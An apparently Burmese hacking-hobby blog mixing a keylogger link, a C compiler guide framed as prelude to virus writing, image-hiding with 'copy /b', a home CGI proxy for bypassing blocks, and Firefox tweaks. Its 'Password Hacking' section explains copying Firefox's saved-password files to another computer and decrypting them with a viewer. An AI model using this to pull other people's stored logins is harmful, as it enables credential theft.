Subscribe:

Blogroll

Related Posts Plugin for WordPress, Blogger...

Labels

Followers

Contributors

Monday, April 25, 2011

keylogger

http://www.desktopshark.com/?gclid=CJ-ljLjmtqgCFZoT3wodmVkADw

hacking ways

wordpress ရဲ့ text box က java ကအလုပ်မလုပ်တော့ html ပြောင်းထည့်ရပါတယ်။ wordpress ရဲ့ text box ထဲမှာ

<html>
<head>
<script language="javascript" type="text/javascript">
window.onbeforeunload = askConfirm;
function askConfirm(){
return "ဒီမှာ ကြိုက်တာရေးပါ";
}
</script>
</head>
<body>
</body>
</html>

ဒီလိုထည့်ပေးရင် ရပါတယ်နော်.. အဆင်ပြေပါစေဗျာ..

http://www.seepassword.com/

http://www.sawsan23.tk/

Friday, April 8, 2011

how to complie the c program

C Programsကို ဘယ်လို Compileလုပ်မလဲ

နောက်ထပ်တင်ပေးမယ့် ဗိုင်းရပ်ဖန်တီးခြင်းအပိုင်းတွေအတွက် ဒီပို့ကိုတင်ပေးလိုက်ပါတယ်။ ဘာလို့လဲဆိုတော့ ဖန်တီးတဲ့နေရာမှာ C Programming Languageကို သုံးမှာ ဖြစ်လို့ပါ။ သိပြီး၊ တတ်ပြီးသားသူတွေအတွက်မဟုတ်ပါဘူး။ C Programming ကို မသိသေးတဲ့သူတွေနဲ့ C Programming ကို အခုမှစတင်သင်ကြားနေသူတွေအတွက်ပါ။ ထုံစံအတိုင်း သူများ post ကို ဘာသာပြန်ပြီးတင်ပေးလိုက်တာပါပဲ။ Borland C++ compiler 5.5 ကို ဘယ်လို install လုပ်မလဲနဲ့ C Programs ကိုဘယ်လို Compile(ပရိုဂရမ် ဘာသာစကား တစ်ခုခုဖြင့် ရေးသားထားသော အမိန့်ညွှန်ကြားချက် ကို စက်နားလည်အောင် ပြောင်းလဲပေးရန် ကွန်ပျူတာပရိုဂရမ်ကို အသုံးပြုသည်။)ဘယ်လိုလုပ်မလဲ ဆိုတာပါ။

Borland C++ compiler ကိုဘယ်လို installလုပ်မလဲ

(၁) Borland C++ compiler5.5 ကို ဒီနေရာမှာ download ချလိုက်ပါ ( သို့ ) http://www.codegear.com/downloads/free/cppbuilder ကို သွားပြီးတော့လည်း downလို့ရပါတယ်။

(၂)download လုပ်ပြီးပြီးဆိုရင်တော့ freecommandlinetools.exe ကို run လိုက်ပါ။ သီးခြား location သတ်မှတ်ပေးထားခြင်းမရှိဘူးဆိုရင်တော့ C:\Borland\BCC55 ထဲကို installation လုပ်ပါလိမ့်မယ်။

Borland C++ compile ကို configure[(အခြားပစ္စည်းများနှင့် တွဲဖက်သုံးနိုင်ရန်) သီးသန့် စီစဉ်ထားရှိသည်။] ဘယ်လိုလုပ်မလဲ
(၁)Borland C++ compier ကို install လုပ်ပြီးရင် Text Document နှစ်ခု ဖန်တီးလိုက်ပါ။ပထမ new text document.txt ဖိုင်ကိုဖွင့်ပြီး အောက်မှာပေးထားတဲ့ code နှစ်ခုကိုထည့်ပေးလိုက်ပါ။
-l"c:\Borland\Bcc55\include"
-L"c:\Borland\Bcc55\lib"
(၂)ပြီးရင် အဲဒီ New Text Document.txt ကို bcc32.cfg နဲ့ rename ပေးပြီး save လိုက်ပါ။ Save as type နေရာ All files ပြောင်းပေးဖို့လိုပါတယ်။
(၃)ပြီးရင် ဒုတိယ New Text Document(2).txt ဖိုင်ကိုဖွင့်ပြီး အောက်က code ကိုထည့်ပေးပါ။
-L"c:Borland\Bcc55\lib"
(၄)code ထည့်ပြီးသွားရင် ilink32.cfg နဲ့ saveလိုက်ပါ။ Save as type ကတော့ All files ပါပဲ။
(၅)အခုလုပ်ပြီးသွားတဲ့ ဖိုင်နှစ်ခု (bcc32.cfg နဲ့ ilink32.cfg)ကို copy လုပ်ပါ။ ပြီးရင် C:\Borland\BCC55\Bin ထဲကိုသွားပြီး paste ပေးလိုက်ပါ။

C source code (.C files) ကိုဘယ်လို compile ဖြစ်အောင်လုပ်မလဲ
(၁)ပထမဆုံး .C (example.c) ဖိုင် ကို compile ဖြစ်လာဖို့ အောက်ပါ location ထဲမှာ သွားထည့်လိုက်ပါ။
C:\Borland\BCC55\Bin
(သင် compile ဖြစ်ချင်တဲ့ (.c) နဲ့ save ထားတဲ့ C source code ကိုဆိုလိုပါတယ်)
(၂)command prompt ကိုဖွင့်လိုက်ပါ။ ( Start>Run>type cmd > Enter)
(၃)ပြီးရင် C:\Borland\BCC55\Bin\bcc32 example.c ကိုရိုက်လိုက်ပါ။ (CD command ကိုသုံးပါ)
(၄) source code ထဲမှာ error မရှိဘူး ဆိုရင်တော့ (example.exe) ဖိုင်ကို locationတခု(C:\Borland\BCC55\Bin)ထဲမှာတွေ့ရမှာဖြစ်ပါတယ်။
ကဲ..အခု source code ကို executable file(.exe file)အဖြစ် compiled လုပ်ခြင်းအောင်မြင်သွားပြီးဆုံးသွားပါပြီး။

(Srikanth ရဲ့ How to Compile C Programs မှ)

Tuesday, April 5, 2011

ဓာတ်ပုံထဲမှာဒေတာ ဖွက်ထားမယ်

ဓါတ်ပုံတွေထဲမှာ Data တွေကို ဖွက်ထားရအောင်

အခု ကျွန်တော် ဖော်ပြမယ့် အကြောင်းအရာကတော့ မိမိ ဖွက်ထားလိုတဲ့ Data တွေကို CMD ကိုအသုံးပြုပြီးတော့ ဓါတ်ပုံထဲမှာ ဖွက်ထားမယ့် နည်းလမ်းပဲ ဖြစ်ပါတယ်....မိမိဖွက်လိုတဲ့ Data တွေကို ဖွက်ထားဖို့ အတွက် ကွန်ပျူတာမှာ Winrar တင်ထားပြီး ဖြစ်ရပါ့မယ်....Winrar မတင်ထားရသေးဘူးဆိုရင်တော့ Winrar ကို စက်ကို ပထမဆုံး Install လုပ်လိုက်ပါ....Install လုပ်ပြီးသွားပြီ ဆိုရင်တော့ တစ်ဆင့်ချင်း သွားပါ့မယ်......

၁။ ပထမဆုံး Desktop ပေါ်မှာ New Folder တည်ဆောက်ပြီး မိမိပေးချင်တဲ့ နာမည်ကို ပေးပါ့မယ်...ကျွန်တော်ကတော့ ForHide ဆိုတဲ့ နာမည်ကို ပေးပြီး တည်ဆောက်ထားပါတယ်....

၂။ ဒုတိယအဆင့်အနေနဲ့ မိမိဖွက်ထားလိုတဲ့ Data တွေကို Winrar အသုံးပြုပြီးတော့ Winrar ထဲမှာ ထည့်ထားရပါ့မယ်...Winrar ထဲထည့်ပြီးသွားပြီဆိုရင်တော့ အစက မိမိနှစ်သက်ရာ နာမည်ကို အသုံးပြုပြီး တည်ဆောက်ထားတဲ့ Folder ထဲကို မိမိ ဖွက်ထားလိုတဲ့ Data rar File နဲ့ မိမိသိမ်းထားလိုတဲ့ ဓါတ်ပုံကို ထည့်ပါ့မယ်..

၃။ ထည့်ပြီးသွားပြီ ဆိုရင်တော့ Command Prompt ကိုဖွင့်ဖို့အတွက် Run Box ထဲမှာ cmd ဆိုပြီး ရိုက်ထည့်၍ သော်လည်းကောင်း ၊ start/cmd ဆိုပြီး ရိုက်ထည့်၍ သော်လည်း CMD Box ကိုဖွင့်ပါ့မယ်...Cmd ပွင့်လာပြီ ဆိုတာနဲ့ အောက်ပါ Command ကိုရိုက်ထည့်ပါ့မယ်....
cd Desktop\ForHide

၎။ အထက်ပါအတိုင်း ရိုက်ထည့်ပြီးပြီ ဆိုတာနဲ့ အောက်ပါ အတိုင်း ဆက်လက်ရိုက်ထည့်ပါ့မယ်....
copy /b 1.png + ImageHide.rar 1.png

ဒီနေရာလေးမှာ 1.png နေရာမှာကတော့ ဓါတ်ပုံမှာ ပေးထားတဲ့ နာမည်နဲ့ png ဆိုတာကတော့ ဓါတ်ပုံ File Type အမျိုးအစားပဲ ဖြစ်ပါတယ်...(ဥပမာ တစ်ခြား နာမည်တစ်ခုနဲ့ တစ်ခြား ဓါတ်ပုံဖိုင်တိုက် ဖြစ်တယ်ဆိုရင် myimage.jpg ဆိုပြီး ပြောင်းလဲရေးရပါ့မယ်...ImageHide.rar ဆိုတာကတော့ အစက Winrar ကိုအသုံးပြုပြီး Data တွေကို ထည့်ထားတဲ့ rar နာမည်ပဲ ဖြစ်ပါတယ်..ဥပမာ (mydata.rar ဆိုပြီး ပြောင်းရေးရပါ့မယ်....)

၅။ ပြီးတာနဲ့ exit လို့ရိုက်ထည့်ပြီး CMD Box ကို ပိတ်လိုက်ပါ့မယ်...ယခုဆိုရင်တော့ မိမိဖွက်ထားလိုတဲ့ Data တွေဟာ ဓါတ်ပုံထဲကို အလိုလို ကူးထည့်ပြီးသား ဖြစ်သွားပါပြီ....ဓါတ်ပုံပေါ်မှာ Right Click ထောက်ပြီး Properties ကိုကြည့်ခြင်းအားဖြင့် သိရှိနိုင်ပါတယ်.....

၆။ Data တွေကို ဓါတ်ပုံထဲမှာ ဖွက်ထားပြီးပြီ ဆိုတော့ ထို ဓါတ်ပုံထဲမှ Data တွေကို ပြန်ပြီး ယူဖို့အတွက် ပထမဆုံး Data တွေ ဖွက်ထားတဲ့ ဓါတ်ပုံမှာ Right Click ထောက်ပြီး Change ဆိုတာကို Click လိုက်ပါ....

၇။ Open With Box တစ်ခု ထွက်လာပါလိမ့်မယ်..ထို Open With Box ရဲ့ Down Arrow မှတစ်ဆင့် Winrar ကို Select လုပ်ပြီး Ok ပေးလိုက်ပါ.....

၈။ Ok ပေးပြီးတာနဲ့ Data တွေဖွက်ထားတဲ့ ဓါတ်ပုံမှာ Right Click ထောက်ပြီး Open With မှတစ်ဆင့် Winrar ကို ရွေးချယ်ပေးလိုက်ပါ...

၉။ အခုဆိုရင် မိမိ ဖွက်ထားတဲ့ Data တွေကို မြင်တွေ့ရမှာပဲ ဖြစ်ပါတယ်.....

အခုဆိုရင် Data တွေကို ဖွက်တာရော ပြန်ပြီး ဖော်တာပါ အောင်မြင်စွာ လုပ်ဆောင်ပြီးသွားပါပြီ....စမ်းသပ်ရင်း ပျော်ရွှင်နိုင်ကြပါစေဗျာ....

making the own proxy server

ကိုယ်ပိုင် proxy server ပြုလုပ်ခြင်း

ဒီpostကတော့ Banned Websiteတွေကို ၀င်နိုင်တဲ့ နည်းလမ်း(၁၀)ခု ထဲက ၉ ခုမြောက် နည်းလမ်းကို အထောက်အကူပြုစေနိုင်ဖို့ဖြစ်ပါတယ်။ ဒီနည်းလမ်း နံပါတ် ၉ ဟာ အခြား နည်းလမ်းတွေထက်သာလွန်တဲ့ အချက်တွေ ရှိနေပါတယ်။ ပထမအချက်အနေနဲ့ free public proxy တွေဟာ ဘယ်တော့မှ safe မဖြစ်ပါဘူး ။ အဲဒီ serverတွေက သင့်ရဲ့ ပုဂ္ဂိုလ်ရေးဆိုင်ရာတွေ၊ ကိုယ်ပိုင်သတင်းအချက်အလက်တွေကို ထိခိုက်စေနိုင်သလို အဲဒီ server တွေဟာ proxy software အသုံးပြုပြီး block တာကိုလည်း ခံရနိုင်ပါတယ်။ နောက်တချက်ကတော့ သင့်ကိုယ်ပိုင် proxy server အသုံးပြုခြင်းဖြင့် သင်ကိုယ်တိုင် အပြည့်အ၀ ထိန်းချုပ်လုပ်ကိုင်နိုင်တာပဲ ဖြစ်ပါတယ်။ ဒါ့အပြင် သင် browse လုပ်ခဲ့တာကို ဘယ်သူမှမသိစေဖို့အတွက် သင့်ရဲ့ traffic ကိုလည်း လျှို့ ၀ှက်ထားနိုင်ပါတယ်။

ဒီpost မှာတော့ Windows XP တင်ထားတဲ့ computer တစ်ခုပေါ်မှာ Http proxy server တစ်ခုဘယ်လိုပြုလုပ်နိုင်သလဲ ဆိုတာကို ဖော်ပြထားပါတယ်။

အဆင့် ၁ - Perl distribution ကို Download ပြုလုပ်ခြင်း နှင့် install ပြုလုပ်ခြင်း
Active State site မှ Active Perl ရဲ့ Windows x86 version ကို download ပြုလုပ်ပါ။ ကျနော် "C:\usr\" ထဲကို set လုပ်ဖို့အတွက် အကြံပေးထားတာတွေကလွဲလို့ ကျန်တာတွေကို default configuration ထဲမှာပဲ install လုပ်ပါ။

အဆင့် ၂ - Apache server ကို Download ပြုလုပ်ခြင်း နှင့် install လုပ်ခြင်း
Windows အတွက် နောက်ဆုံးထွက်ရှိတဲ့ Apache server ကို ဒီနေရာကနေ download ပြုလုပ်ပါ။ ၄င်းကို ဘယ်folder ရဲ့ အောက်မှာမဆို HTTP port အနေနဲ့ port 80 မှာ install လုပ်ပါ။ များစွာသော corporate တွေဟာ port 80 access ကိုသာ ခွင့်ပြုမှာဖြစ်တဲ့အတွက် port setting ဟာ 80 ဖြစ်ဖို့အရေးကြီးပါတယ်။ အကယ်၍ prot 80 နဲ့ ပြုလုပ်တဲ့အခါမှာ error တစ်ခုခုဖြစ်ခဲ့မယ်ဆိုရင် ဖြစ်နိုင်ခြေရှိတဲ့ အခြား တစ်ခုကို အသုံးပြုသင့်ပါတယ်။ (အချို့ ISP ( Internet Service Provider ) တွေက port 80 မှာ host လုပ်ထားရင် block လုပ်တတ်ပါတယ်။ အဲဒီအတွက် port 443 မှာ host လုပ်သင့်ပါတယ်။ )

အဆင့် ၃ - Apache server ကိုတွဲဖက်အသုံးပြုနိုင်ရန် ပြင်ဆင်ခြင်း
ဒီအဆင့်မှာတော့ CGI ကို enable ဖြစ်စေဖို့အတွက် Apache ကိုပြင်ဆင်ထားဖို့လိုအပ်ပါတယ်။ httpd.conf ( apache ရဲ့ subfolder conf ထဲမှာ တည်ရှိပါ။) ထဲမှာ #AddHandler cgi-script.cgi ကိုရှာတွေ့ပါလိမ့်မယ်။ ၄င်း ရှေ့ မှာရှိတဲ့ hash(#) ကိုဖယ်ရှားလိုက်ပါ။
http.conf ထဲမှာ string လုပ်ဖို့အတွက် "you set DocumentRoot to" ဆိုတာကိုရှာတွေ့ပါလိမ့်မယ်။ ၄င်းရဲ့ အောက်မှာ Option directive တွေကို သင်မြင်ရပါမယ်။ ၄င်းကို Options Indexes Inculdes FollowSymlinks SymLinksifOwnerMatch ExecCGI MultiViews သို့ပြောင်းလိုက်ပါ။

အဆင့် ၄ - CGIProxy( nph-proxy) ကို Download ပြုလုပ်ခြင်း နှင့် install လုပ်ခြင်း
CGIProxy (nph-proxy0 ကို ဒီနေရာကနေ download လုပ်ပါ။ ပြီးရင် အဲဒီ file ကို nph-proxy.cgi ဆိုပြီး rename ပေးလိုက်ပါ။ အဲဒီနောက် Apache ရဲ့ document root (htdocs) ထဲကို copy လုပ်ပါ။ ပြီးရင်တော့ nph-proxy.cgi ထဲမှာရှိတဲ့ ပထမဆုံးအကြောင်းကို #!C:\usr\perl\bin\perl.exe ဆိုပြီးပြောင်းလဲလိုက်ပါ။
bin folder (httpd.exe) ထဲမှာရှိတဲ့ Apache ကို start လုပ်ပါ။ အခုဆိုရင် browser session တစ်ခုပွင့်လာပြီး http://localhost/nph-proxy.cgi ကိုညွှန်ပြနေပါလိမ့်မယ်။ အကယ်၍ သင်လုပ်ခဲ့တာတွေ အားလုံး အိုကေမှာဆိုပြေမယ်ဆိုရင်တော့ အောက်ကပုံမှာပြထားတဲ့ အတိုင်းမြင်တွေ့ရပါလိမ့်မယ်။

သင့်home connection ရဲ့ IP address ကိုရှာပါ။ command prompt ထဲမှာ ipconfig လို့ ရိုက်ခြင်းအားဖြင့်တွေ့နိုင်ပါတယ်။ အခုဆိုရင်တော့ office machine မှ http://IP ADDRESS/ ကို access လုပ်ပါပြီ။ proxy ပုံစံကို ကျနော်တို့အထက်မှမြင်တွေ့ခဲ့ရတဲ့အတိုင်း သင်မြင်နိုင်မှာဖြစ်ပါတယ်။

မှတ်ချက်။ အကယ်၍ သင်ဟာ WIFI network ကို အသုံးပြုနေတယ်ဆိုရင်တော့ အထက်မှာ ဖော်ပြထားတဲ့ အဆင့်နဲ့ မလုံလောက်ပဲ နောက်ထပ်အဆင့်တွေထပ်လိုအပ်အုံးမှာဖြစ်ပါတယ်။

e-books

Hacking အတွက်လေ့လာရန် စာအုပ်များ

Head First Java ( Kathy Sierra & Bert Bates )
Pro ASP.NET 3.5 in C# 2008 ( Mattew Macdonald & Mario Szpuszta )
C++ Teach Yourself ( ဦးအောင်မြင့်)
C double Plus ( Ian Joyner )
Teach Yourself C Double Plus In 21 days ( SAM )
VCVisual C++ Unleashed
Fortran
Pascal ( Sam Abolrous )

Nov
16

ဒီနေရာလေးမှာတော့ ကျနော် ဖတ်လို့အဆင်ပြေတဲ့ ၊ ကြိုက်တယ်လို့ထင်တဲ့ စာအုပ်လေးတွေကို စုစည်းထားတာပါ။
တခြား website တွေ blog တွေကနေ download ချထားတဲ့ စာအုပ်လေးတွေပါ။

Monday, April 4, 2011

Firefox ၏ Screen နောက်ကွယ်မှ လျှို့ ၀ှက်ချက်များ

Firefox အသုံးပြုသူများအတွက် Firefox browser ကို စိတ်ကြိုက်ကလိလို့ရအောင် ၄င်းရဲ့ နောက်ကွယ်မှ လျှို့ ၀ှက်ချက်တွေနဲ့ မိတ်ဆက်ပေးလိုက်ပါတယ်...။ Firefox browser ဟာ အသုံးပြုရ အဆင်ပြေတဲ့ browser ဆိုတာ သုံးစွဲသူတိုင်း သိကြပါတယ်...။ ဒါပေမယ့် version အသစ်တွေ ခဏခဏထွက်လို့ upgrade ပေးပြီးတဲ့ အခါမှာ page loading ဟာ ကြာတတ်ပါတယ်...။ ဒါကြောင့်...

Firefox ရဲ့ Page Loading ကို ပိုမြန်အောင်လုပ်နိုင်တဲ့ နည်းလမ်း ( ၅ ) ခု

၁။ Pipelining ကို Enable ပြုလုပ်ခြင်း

ဒါကတော့ Friefox version တွေ အကုန်လုံးအတွက် အခြေခံကျတဲ့ နည်းလမ်းတစ်ခုပါ။ Firefox ရဲ့ address bar ထဲမှာ about:config လို့ရိုက် Enter ခေါက်လိုက်ပါ... သတိပေးတဲ့ message ပေါ်လာပါလိမ့်မယ်။ I'll be careful, I proxise! ဆိုတာကို click ပါ။ ပြီးရင် network.http.pipelining နဲ့ network.http.proxy.pipelining ဆိုတာတွေကို လိုက်ရှာပါ။ မတွေ့ရင် အပေါ်က Filter ထဲမှာ ရိုက်ပြီး ရှာလိုက်ရင်လည်း ရပါတယ်။ တွေ့ပြီးဆိုရင် ၄င်းတို့ပေါ်မှာ double click လုပ်ပြီး values တွေကို true လို့ပေးလိုက်ပါ။ ပြီးရင် network.http.pipelining.maxrequests ပေါ်မှာ double click လုပ်ပြီးရင် ၄င်းရဲ့ value ကို 8 လို့ပေးလိုက်ပါ။

၂။ Content switch threshold ကို လျှော့ချခြင်း

အကယ်၍ သင့်ရဲ့ mouse (သို့) keyboard ကို မရွှေ့ မထိပဲ 0.75 စက္ကန့် (Content Switch Threshold ) ကြာခဲ့မယ်ဆိုရင် Firefox ဟာ frequency နိမ့်တဲ့ interrupt mode ထဲကို ရောက်သွားပါလိမ့်မယ်။ ဆိုလိုတာကတော့ ၄င်းရဲ့ ကြားခံဆက်သွယ်ပေးတဲ့စနစ်ဟာ တုန့်ပြန်မှုနည်းလာပါလိမ့်မယ်...ဒါပေမယ့် သင့်ရဲ့ page loadတွေကတော့ ပိုပြီးမြန်ဆန်လာမှဖြစ်ပါတယ်။ ဒါကြောင့် အခုလိုပိုပြီးမြန်ဆန်လာစေဖို့ Content Switch Threshold ကို လျှော့ချပေးဖို့လိုပါတယ်။ about:config ကိုရိုက် Enter ခေါက် ပြီးရင် ပွင့်လာတဲ့ windows ပေါ်မှာ right-click လုပ်၊ ပြီးရင် New ထဲကမှာ Integer ကို click ၊ အဲဒီနောက် content.switch.threshold လို့ရိုက် OK ပေး ပြီးရင် 250000 ( a quarter of a second ) ကိုထည့် OK ပေးလိုက်... ဒါဆိုရပါပြီ။

၃။ Flash ကို Block ခြင်း

Flashblock extension ကို Install လုပ်ဖို့လိုက်ပါ။ ( http://flashblock.mozdev.org တွင် download ပြုလုပ်ပါ။) ၄င်းက Flash appletတွေ အားလုံးကို loading ပြုလုပ်ခြင်းမှာ block လုပ်ပါလိမ့်မယ်။ ဒါကြောင့် web pages တွေဟာ ပိုပြီးမြန်မြန်ဆန်ဆန် ဖော်ပြပေးပါလိမ့်မယ်။ အကယ်၍ Flash content အချို့ ကို ရှာဖွေချင်တယ် ဆိုရင်တော့ ၄င်းရဲ့ Placeholder ကို download အတွက် click လိုက်ခြင်းအားဖြင့် ပုံမှန်အတိုင်း applet ကို ပြသပေးပါလိမ့်မယ်။

၎။ cache အရွယ်အစားကို တိုးစေခြင်း

သင် web တစ်ခုကို ဖွင့်ကြည့်လိုက်စဉ်မှာ Firefox က site ရဲ့ images နဲ့ scriptတွေ ကို local memory cache တစ်ခုထဲမှာ သိမ်းဆည်းထားလိုက်ပြီး အကယ်၍ သင်က တူညီတဲ့ page တစ်ခုကို ပြန်ပြီးဖွင့်မယ်ဆိုရင် locak memory cache ကနေ သိမ်းထားတဲ့ အချက်အလက်တွေကို ပိုပြီး မြန်မြန်ဆန်ဆန် ပြန်ထုတ်ပေးနိုင်ပါတယ်။ သင့်မှာ RAM အများကြီး( 2GB နဲ့အထက် ) ရှိတယ်ဆိုရင် ဖွင့်ပြီးသား page တစ်ခုကို ပြန်ဖွင့်တိုင်းမှာ မြန်မြန်ဆန်ဆန်ဖွင့်လို့ရစေဖို့အတွက် cache size ကို တိုးထားသင့်ပါတယ်။ ဒီ့အတွက် about:config လို့ရိုက် Enter နှိပ် ပြီးရင် ပွင့်လာတဲ့ window ထဲက ဘယ်နေရာမှာမဆို right-click ပြီးရင် New ထဲက Integer ကိုသွားပါ။ အဲဒီထဲမှာ browser.cache.memory.capacity လို့ရိုက် OK ပေး၊ ပြီးရင် ၄င်းပေါ်မှာ double-click လုပ်၊ value ကို 65536 လို့ရိုက် OK ပေး၊ အဲဒီနောက် သင့်ရဲ့ browser ကို restart ပေးလိုက်ပါ။

၅။ Render မြန်စေခြင်း

ကြီးမားပြီး ရှုပ်ထွေးတဲ့ web pageတွေကို ဖွင့်တဲ့ အခါမှာ အချိန်တော်တော်ကြာတတ်ပါတယ်။ Firefox က သင့်ကို မစောင့်စေချင်ပါဘူး ... ဒါကြောင့် 0.12 စက္ကန့်တိုင်းမှာ ရရှိတဲ့အချက်အလက်တွေ(content notify interval)ကို default အားဖြင့်ဖော်ပြပေးပါတယ်။ ဒီလိုအချိန်တွေမှာ browser ဟာ တဖြည်းဖြည်း ဖျက်ကနဲ့ ဖျက်ကနဲ ဖော်ပြပေးပြီး တိုးလာတဲ့ စုစုပေါင်း page loading လုပ်တဲ့ အချိန်ကိုလည်း မကြာမကြာလျော့ကျစေပါတယ်။ ဒါကြောင့် ကြီးမားတဲ့ content notify interval ဟာ ပိုပြီး မြန်ဆန်စေပါလိမ့်မယ်။ ဒီ့အတွက်... about:config ကိုရိုက်၊ Enter နှိပ်၊ ပြီးရင် ပွင့်လာတဲ့ Window ရဲ့ တနေရာရာမှာ right-click ( Apple userတွေအတွက်က ctrl-click)လုပ်၊ New ထဲက Integer ကို click ပြီး preference name ကို content.notify.interval လို့ရိုက် OK ပေး ပြီးတော့ 500000 ( ငါးသိန်း) လို့ရိုက်ထည့် ပြီးရင် OK ထပ်ပေးပါ။
Window ထဲမှာ right-click ထပ်လုပ်ပါ။ ပြီးရင် New ထဲက Boolen ကို click ပါ။ ဒီတကြိမ်မှာတော့ content.notify.ontimer ဆိုတဲ့ value တစ်ခုပြုလုပ်ပြီး True ပေးလိုက်ပါ။ ဒါဆိုပြီး ပါပြီ။

Password Hacking

အကယ်၍ သင်က သင့်ရဲ့ browser မှာရှိတဲ့ Tools > Options > Security ထဲမှာ Remember password for sites ကို check ပေးထားမယ်ဆိုရင် site တစ်ခုကို ၀င်တဲ့ အခါတိုင်းမှာ notification bar တစ်ခု ပေါ်လာပြီး username နဲ့ password ကို save လုပ် မလုပ်ဆိုတာ မေးပါလိမ့်မယ်။ အကယ်၍ uncheck လုပ်ထားရင်တော့ မေးမှာမဟုတ်ပါဘူး။ check မပေးထားလည်းပဲ အလိုအလျှောက် save လို့ရအောင် javascrpit ဖိုင် တချို့ ကို ပြုပြင်လိုက်ရင်လည်း အလိုအလျှောက် save လုပ်နိုင်ပါတယ်။ ဘယ်လိုလုပ်ရမလဲဆိုတာကို တချို့ Social Site တွေမှာလည်း ဖော်ပြထားတာတွေ့တဲ့အတွက် မဖော်ပြပေးတော့ပါ။ နောက်တစ်ခုက Bookmoark Sync ကို သုံးပြီးတော့လည်း Firefox မှာ username နဲ့ password တွေကို save လို့ရပါသေးတယ်။
အခုလို save လုပ်ထားတဲ့ password တွေကို ဘယ်လို hack လို့ရနိုင်သလဲ ဆိုတာကို ဖော်ပြပေးပါမယ်။ hacking လို့ ခေါင်းစဉ်တပ်ထားပေမယ့် ဒါဟာ အမှန်တကယ် hacking တစ်ခုတော့ မဟုတ်ပါဘူး ။ Firefox ဟာ သင့်ရဲ့ computer ပေါ်မှာ အမျိုးအမျိုးသော သတင်းအချက်အလက်တွေကို သိမ်းဆည်းနိုင်တဲ့ bookmarks, plugins နဲ့ history ကဲ့သို့ profile directory တစ်ခုကို ဖန်တီးပါတယ်။ အဲဒီမှာ ဖိုင် နှစ်ခုဟာ password တွေကို သိမ်းထားဖို့အတွက် အသုံးပြုလေ့ရှိပါတယ်။
၁။ key3.db - ဒီဖိုင်က save ထားတဲ့ passwordတွေကို encrypt လုပ်ပြီး encryption key ရဲ့ copy တစ်ခုကို သိမ်းထားပါတယ်။
၂။ signons.txt, stgnons2.txt (သို့) stgnons3.txt - ဒီဖိုင်တွေက save လုပ်ထားတဲ့ passwords တွေကို သိမ်းထားပါတယ်။ ၄င်းတို့ဟာ encrypt လုပ်ထားတဲ့ passwords နဲ့ Logonတွေပါဝင်တဲ့ ရိုးရိုး text file တွေဖြစ်ပါတယ်။ signons.txt file ကတော့ Firefox version 2 အစောပိုင်း version တွေမှာ အသုံးပြုပြီး signons2.txt ကတော့ Firefox version 2.0.0.2 နဲ့ နောက်ပိုင်း version တွေမှာ အသုံးပြုပါတယ်။ Firefox 3 နဲ့ နောက်ပိုင်း Version အသုံးပြုသူတွေကတော့ signons3.txt file ကိုရှာရပါမယ်။ signons3.txt file ကို signons.sqlite နဲ့ ဖုံးအုပ်ထားပါတယ်။

ဒီ file တွေကို ဘယ်မှာ ရှာရမလဲဆိုတော့ Profile directory ထဲမှာ ၄င်း fileတွေကို သိမ်းထားပါတယ်။ အောက်မှာဖော်ပြထားတဲ့အတိုင်း Run ထဲမှာ ရိုက်ထည့်လိုက်ရင် operating system ပေါ်မှာ ပြုလုပ်ထားတဲ့ profile folder ထဲကို browsing လုပ်ခြင်းအားဖြင့် ၀င်ရောက်နိုင်ပါတယ်...

Windows 7/Vista/ XP : %APPDATA%\Mozilla\Firefox\Profiles\
Mac OS : ~/Library/Application Support/Firefox/Pofiles/

အကယ်၍ သင့်ရဲ့ Profile directory ကိုမတွေ့ဘူးဆိုရင်တော့ Mozila support page မှာ သွားကြည့်ပါ။
၎င်း file နှစ်ခုကို တစ်ခြားcomputer တစ်ခုဆီသို့ copy ကူးပြီးပို့လိုက်လို့ရပါတယ်...။ သင်ဟာ password တွေကို save လုပ်မိမယ်ဆိုရင် အဲဒီဖိုင်တွေထဲမှာ သင့်ရဲ့ password ပါသွားပါပြီ။ encrypt လုပ်ထားတဲ့ password တွေကို ရှာဖို့အတွက်က Fire Password Viewer ကို အသုံးပြုနိုင်ပါတယ်။

Hacking Network Connection

၁။ server ပေါင်းစုံမှ connection ကို ရနိုင်သမျှရအောင်...

about:config ထဲမှာ network.http.max-connection ဆိုတာရှိပါတယ်။ ၄င်းက များစွာသော network connection တွေကို ထိန်းချုပ်ပြီး Firefox က Web servers အရေအတွက် ဘယ်လောက်များများ တကြိမ်ချင်း ပြုလုပ်ပါတယ်။ အကယ်၍ သင်ဟာ tabတွေ အများကြီးနဲ့ home page အမျိုးမျိုးကိုဖွင့်လို့အဆင်ပြေစေဖို့ (သို့) အမျိုးမျိုးသော server တွေနဲ့ ချိတ်ထားတဲ့ pageတွေကို ၀င်ရောက်ချင်တယ် ဆိုရင် network.http.max-connection ပေါ်မှာ double click လုပ်ပြီး value ကို 32လို့ထည့်ပေးလိုက်ပါ။

၂။ တူညီတဲ့ server မှ connection ကို ရနိုင်သမျှရအောင်...

about:config ထဲမှာရှိတဲ့ network.http.max-connections-per-server ကတော့ သီးခြား connection တွေအတွက် ထိန်းချုပ်ပါတယ်။ page တစ်ခုထဲမှာရှိတဲ့ element မျိုးစုံကို အပြိုင်download ချနိုင်ဖို့ ခွင့်ပြုတဲ့ တူညီတဲ့ server အတွက်ပဲ အလုပ်လုပ်ပါတယ်။ network.http.max-connections-per-server ကို double-click လုပ်ပြီးရင် value ကို 16 လို့ထည့်လိုက်ပါ။ ဒီထက်တော့ ထက်မမြှင့်ပါနဲ့တော့ ဘာလို့လဲ ဆိုတော့ အချို့ site တွေက bandwidth-protection (သို့) antileeching measure အတွက် သင့်ကို block ပါလိမ့်မယ်။

Hacking Addon

Hacking Addon တွေကို အသုံးပြုချင်ရင် https://addons.mozilla.org/en-US/firefox/tag/hacking မှာ ရယူနိုင်ပါတယ်။

အခုအပေါ်မှာ ပြောခဲ့တာတွေက Firefox ကို hack နိုင်တဲ့ နည်းလမ်းတွေထဲက အနည်းငယ်ကိုသာ ဖော်ပြခဲ့တာဖြစ်ပါတယ်။ အပြည့်စုံဆုံး နဲ့ အများကြီးသိချင်တယ် .... ကလိချင်တယ် ဆိုရင်တော့ အောက်မှာ ပေးထားတဲ့စာအုပ်ကို ဖတ်ဖို့အကြံပြုပါရစေ...

(Educational Purposes Only)

Hacker's Browser v 2.0

Hacker's Browser v 2.0

